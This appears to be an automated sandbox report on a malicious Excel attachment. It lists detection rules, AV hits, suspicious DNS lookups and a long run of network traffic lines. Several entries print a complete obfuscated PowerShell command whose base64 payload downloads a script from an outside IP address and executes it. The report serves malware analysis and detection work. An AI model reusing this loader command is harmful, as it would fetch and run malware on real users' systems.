        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4004, TargetFilename: C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3588, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", CommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICA
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4004, TargetFilename: C:\Users\user\AppData\Local\Temp\zqzkwm3j.klr.ps1

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", ProcessId: 3144, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:38:14.641633+010020241971A Network Trojan was detected23.95.235.2980192.168.2.2249162TCP
        2024-12-12T21:38:19.564144+010020241971A Network Trojan was detected23.95.235.2980192.168.2.2249164TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:38:14.640106+010020244491Attempted User Privilege Gain192.168.2.224916223.95.235.2980TCP
        2024-12-12T21:38:19.563688+010020244491Attempted User Privilege Gain192.168.2.224916423.95.235.2980TCP
        2024-12-12T21:38:40.302835+010020244491Attempted User Privilege Gain192.168.2.224917123.95.235.2980TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:38:39.254404+010020490381A Network Trojan was detected151.101.1.137443192.168.2.2249167TCP
        2024-12-12T21:38:56.429519+010020490381A Network Trojan was detected151.101.65.137443192.168.2.2249172TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:38:27.133480+010028587951A Network Trojan was detected192.168.2.224916523.95.235.2980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Euro confirmation Sp.xlsReversingLabs: Detection: 23%
        Source: C:\Users\user\AppData\Local\Temp\~DF634BD35CC9B94982.TMPJoe Sandbox ML: detected
        Source: Euro confirmation Sp.xlsJoe Sandbox ML: detected

        Phishing

        barindex
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta, type: DROPPED
        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49167 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: unknownHTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49161 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49170 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49169 version: TLS 1.2
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdb source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdbhP source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdbhP source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdb source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: .pdb]sf+ source: powershell.exe, 00000007.00000002.465465325.000000001C40A000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: jktc.pro
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 151.101.65.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.163.184:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.163.184:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.163.184:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
